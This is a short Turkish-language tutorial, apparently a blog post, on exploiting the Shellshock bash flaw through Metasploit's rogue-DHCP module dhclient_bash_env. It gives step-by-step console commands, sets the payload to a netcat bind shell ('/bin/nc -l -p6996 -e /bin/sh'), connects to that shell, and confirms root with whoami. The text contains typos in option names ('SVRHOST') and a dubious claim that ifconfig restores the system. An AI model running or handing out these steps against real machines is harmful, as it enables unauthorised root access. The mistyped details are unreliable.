TR | Metasploit Framework Yardımı ile Shellshock Zafiyetinden Yararlanma
Shellshock Nedir?
Linux sistemlerde bash kabuğunda fark edilen güvenlik açığıdır.
Nasıl Kullanılır?
- Metasploit Framework ü çalıştıyoruz;
msfconsole
- Exploit i arıyoruz;
search shellshock
- Exploit i yüklüyoruz.
use auxiliary/server/dhclient/dhclient_bash_env
- Exploit için gerekli paremetlereler “CMD” , “SRVHOST” VE “NETMASK”. Bunları eğer görüntülemek istersek;
info
- Seçenekleri görüntüleyip parametreleri düzenleme aşamasına geçersek;
show options
- DHPC sunucu ip adresini değişmek için;
set SVRHOST 192.168.131.61
- CMD parametresini düzenlemek için;
set CMD /bin/nc -l -p6996 -e /bin/sh
- Son parametremiz NETMASK için;
set NETMASK 255.255.255.0
- Exploiti çalıştrmak için;
exploit
- Çalıştırdıktan sonra durumu özet geçmek gerekirse hedefin CMD satırında Shellshock zafiyeti sayesinde root yetkisiyle “6996” nolu portla netcat yardımıyla bağlantı kurabiliriz. Exploitli sisteme bağlanmak için;
c::\nc 192.168.131.61 6996
- Exploited Linux sistemin ayarlarına döndürmek için;
ifconfig
yapmamız yeterlidir.
- Sistemdeki yetkimizi check etmek için;
whoami
yapıp root olup olmadığımızı doğrulayabiliriz.